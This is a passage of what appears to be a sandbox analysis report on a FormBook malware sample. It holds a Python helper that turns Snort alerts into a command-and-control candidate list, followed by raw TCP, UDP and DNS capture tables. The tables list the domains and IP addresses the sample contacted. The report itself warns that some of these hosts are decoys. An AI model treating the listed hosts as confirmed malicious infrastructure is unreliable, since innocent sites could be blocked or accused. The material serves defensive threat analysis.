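                orphans.append(a)
    return flows, orphans


def hosts_summary(flows) -> "OrderedDict":
    """Per server, in first-contact order: check-in attempts and HTTP statuses seen."""
    hosts = OrderedDict()
    for (_src, _sport, dst), f in flows.items():
        h = hosts.setdefault(dst, {"attempts": 0, "statuses": []})
        h["attempts"] += 1
        if f.http_status:
            h["statuses"].append(f.http_status)
    return hosts


def checkin_intervals(flows) -> List[float]:
    """Seconds between successive check-ins: the cadence at which the sample moved on."""
    times = [f.first_seen for f in flows.values()]
    return [round((b - a).total_seconds(), 1) for a, b in zip(times, times[1:])]


def c2_candidates(text: str = SNORT_ROWS) -> List[str]:
    """Distinct servers contacted, in first-contact order: the network IOC list for this run."""
    flows, _ = correlate(parse_alerts(text))
    return list(hosts_summary(flows))


if __name__ == "__main__":
    flows, orphans = correlate(parse_alerts(SNORT_ROWS))
    for ip, h in hosts_summary(flows).items():
        print(ip, h)
    print("intervals (s):", checkin_intervals(flows))
    for o in orphans:
        print("403 with no check-in alert: client port", o.dport, "server", o.src)
```

The distinct destination list is the network IOC set for this run, but because FormBook's host list mixes decoy hosts with the live C2, confirm each address before blocking it outright; the 403 responses show only that a web server is reachable there, not that it is the controller.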

                                                                                  Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2021 15:48:24.893784046 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:24.950808048 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:24.950964928 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:24.951699972 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.008614063 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.025301933 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.025373936 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.025415897 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.025437117 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.025466919 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.025510073 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.025569916 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.046997070 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.109159946 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.109416962 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.110708952 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.172595024 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.366941929 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.366987944 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.367011070 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.367031097 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.367062092 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.367183924 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.367233038 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.370872021 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.370913029 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.371051073 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.374882936 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.374922037 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.375049114 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.378856897 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.378895998 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.379014015 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.382847071 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.382886887 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.383028984 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.386208057 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.386245012 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.386413097 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.424439907 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.424484968 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.424638033 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.426333904 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.426373005 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.426485062 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.426554918 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.430352926 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.430393934 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.430495977 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.430531025 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.434340954 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.434385061 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.434663057 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.438359022 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.438399076 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.438570976 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.442317963 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.442362070 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.442518950 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.446342945 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.446378946 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.446490049 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.450381994 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.450421095 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.450472116 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.450500965 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.454277039 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.454317093 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.454452038 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.454483032 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.457855940 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.457896948 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.458045006 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.461452007 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.461494923 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.461616039 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.465009928 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.465058088 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.465181112 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.468590975 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.468632936 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.468741894 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.468817949 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.472181082 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.472228050 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.472352982 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.475821018 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.475863934 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.475989103 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.481808901 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.481848955 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.481952906 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.482027054 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.483354092 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.483395100 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.483474970 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.483532906 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:48:25.486443996 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.486485958 CET | 443 | 49727 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:48:25.486608028 CET | 49727 | 443 | 192.168.2.6 | 142.250.184.65

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2021 15:47:57.409122944 CET | 55074 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:47:57.440130949 CET | 53 | 58377 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:47:57.458034039 CET | 53 | 55074 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:47:58.435882092 CET | 54513 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:47:58.492862940 CET | 53 | 54513 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:47:59.435306072 CET | 62044 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:47:59.486816883 CET | 53 | 62044 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:00.198703051 CET | 63791 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:00.250240088 CET | 53 | 63791 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:01.007292032 CET | 64267 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:01.008606911 CET | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:01.055880070 CET | 53 | 64267 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:01.070396900 CET | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:02.944663048 CET | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:03.002110958 CET | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:03.982208014 CET | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:04.047683001 CET | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:05.828881025 CET | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:05.880536079 CET | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:07.745563030 CET | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:07.794399977 CET | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:09.107074976 CET | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:09.155801058 CET | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:10.051012993 CET | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:10.100179911 CET | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:11.207969904 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:11.259543896 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:12.113063097 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:12.161952019 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:13.752398968 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:13.809654951 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:14.910197973 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:14.958986998 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:16.192214012 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:16.240995884 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:17.214557886 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:17.266032934 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:18.221292019 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:18.270117044 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:23.946151018 CET | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:24.011514902 CET | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:24.826545954 CET | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:24.891527891 CET | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:34.158699989 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:34.207537889 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:53.157656908 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:53.216072083 CET | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:54.784702063 CET | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:54.847906113 CET | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:56.018057108 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:56.032754898 CET | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:56.069770098 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:56.089826107 CET | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:58.103507996 CET | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:58.166277885 CET | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:58.715318918 CET | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:58.790381908 CET | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:59.246304035 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:59.303927898 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:59.852585077 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:59.894917965 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:48:59.901019096 CET | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:48:59.966434956 CET | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:49:00.459866047 CET | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:49:00.526770115 CET | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:49:01.243587017 CET | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:49:01.303563118 CET | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:49:02.725351095 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:49:02.786421061 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:49:03.297482014 CET | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:49:03.357830048 CET | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:49:03.946949005 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:49:04.016402960 CET | 53 | 53799 | 8.8.8.8 | 192.168.2.6
                                                                                  Feb 25, 2021 15:49:04.376604080 CET5468353192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:04.437767029 CET53546838.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:09.219691992 CET5932953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:09.287708998 CET53593298.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:19.691899061 CET6402153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:19.753674984 CET53640218.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:24.866559982 CET5612953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:24.948209047 CET53561298.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:30.146625996 CET5817753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:30.207983017 CET53581778.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:35.434107065 CET5070053192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:35.499968052 CET53507008.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:35.889400959 CET5406953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:35.938209057 CET53540698.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:36.327652931 CET6117853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:36.390299082 CET53611788.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:39.989490986 CET5701753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:40.050118923 CET53570178.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:40.912452936 CET5632753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:41.069926023 CET53563278.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:46.365708113 CET5024353192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:46.569489002 CET53502438.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:52.304527044 CET6205553192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:52.389069080 CET53620558.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:56.194372892 CET6124953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:56.245948076 CET53612498.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:57.400661945 CET6525253192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:57.477340937 CET53652528.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:03.101954937 CET6436753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:03.171494007 CET53643678.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:08.698961973 CET5506653192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:08.828957081 CET53550668.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:13.846144915 CET6021153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:13.916348934 CET53602118.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:19.111793041 CET5657053192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:19.287266016 CET53565708.8.8.8192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 15:48:24.826545954 CET | 192.168.2.6 | 8.8.8.8 | 0x181e | Standard query (0) | doc-0k-78-docs.googleusercontent.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:03.946949005 CET | 192.168.2.6 | 8.8.8.8 | 0x882a | Standard query (0) | www.guidedcommercialloan.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:09.219691992 CET | 192.168.2.6 | 8.8.8.8 | 0x5d63 | Standard query (0) | www.discbrakepart.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:19.691899061 CET | 192.168.2.6 | 8.8.8.8 | 0x6b98 | Standard query (0) | www.truckrev.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:24.866559982 CET | 192.168.2.6 | 8.8.8.8 | 0x6bbe | Standard query (0) | www.quartiercreole.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:30.146625996 CET | 192.168.2.6 | 8.8.8.8 | 0x196 | Standard query (0) | www.wissinkadams.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.434107065 CET | 192.168.2.6 | 8.8.8.8 | 0x1504 | Standard query (0) | www.shopping-container.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:40.912452936 CET | 192.168.2.6 | 8.8.8.8 | 0xe863 | Standard query (0) | www.azhello.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:46.365708113 CET | 192.168.2.6 | 8.8.8.8 | 0x3499 | Standard query (0) | www.africabiocity.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:52.304527044 CET | 192.168.2.6 | 8.8.8.8 | 0x409f | Standard query (0) | www.weebflix.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:57.400661945 CET | 192.168.2.6 | 8.8.8.8 | 0x946c | Standard query (0) | www.nhadat9chu.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:03.101954937 CET | 192.168.2.6 | 8.8.8.8 | 0x237b | Standard query (0) | www.kfs.ltd | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:08.698961973 CET | 192.168.2.6 | 8.8.8.8 | 0x2f27 | Standard query (0) | www.prepa-tests.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:13.846144915 CET | 192.168.2.6 | 8.8.8.8 | 0xf88 | Standard query (0) | www.lvlyourlife.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:19.111793041 CET | 192.168.2.6 | 8.8.8.8 | 0xcc85 | Standard query (0) | www.angelises.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 25, 2021 15:48:24.891527891 CET | 8.8.8.8 | 192.168.2.6 | 0x181e | No error (0) | doc-0k-78-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:48:24.891527891 CET | 8.8.8.8 | 192.168.2.6 | 0x181e | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.184.65 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:04.016402960 CET | 8.8.8.8 | 192.168.2.6 | 0x882a | No error (0) | www.guidedcommercialloan.com | guidedcommercialloan.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:04.016402960 CET | 8.8.8.8 | 192.168.2.6 | 0x882a | No error (0) | guidedcommercialloan.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:09.287708998 CET | 8.8.8.8 | 192.168.2.6 | 0x5d63 | No error (0) | www.discbrakepart.com | discbrakepart.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:09.287708998 CET | 8.8.8.8 | 192.168.2.6 | 0x5d63 | No error (0) | discbrakepart.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:19.753674984 CET | 8.8.8.8 | 192.168.2.6 | 0x6b98 | No error (0) | www.truckrev.com | truckrev.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:19.753674984 CET | 8.8.8.8 | 192.168.2.6 | 0x6b98 | No error (0) | truckrev.com | | 160.153.136.3 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:24.948209047 CET | 8.8.8.8 | 192.168.2.6 | 0x6bbe | No error (0) | www.quartiercreole.net | quartiercreole.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:24.948209047 CET | 8.8.8.8 | 192.168.2.6 | 0x6bbe | No error (0) | quartiercreole.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:30.207983017 CET | 8.8.8.8 | 192.168.2.6 | 0x196 | No error (0) | www.wissinkadams.com | wissinkadams.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:30.207983017 CET | 8.8.8.8 | 192.168.2.6 | 0x196 | No error (0) | wissinkadams.com | | 34.98.99.30 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | www.shopping-container.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:35.499968052 CET | 8.8.8.8 | 192.168.2.6 | 0x1504 | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:41.069926023 CET | 8.8.8.8 | 192.168.2.6 | 0xe863 | No error (0) | www.azhello.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:41.069926023 CET | 8.8.8.8 | 192.168.2.6 | 0xe863 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 18.189.205.91 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:41.069926023 CET | 8.8.8.8 | 192.168.2.6 | 0xe863 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.131.252.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:41.069926023 CET | 8.8.8.8 | 192.168.2.6 | 0xe863 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.138.83.135 | A (IP address) | IN (0x0001)
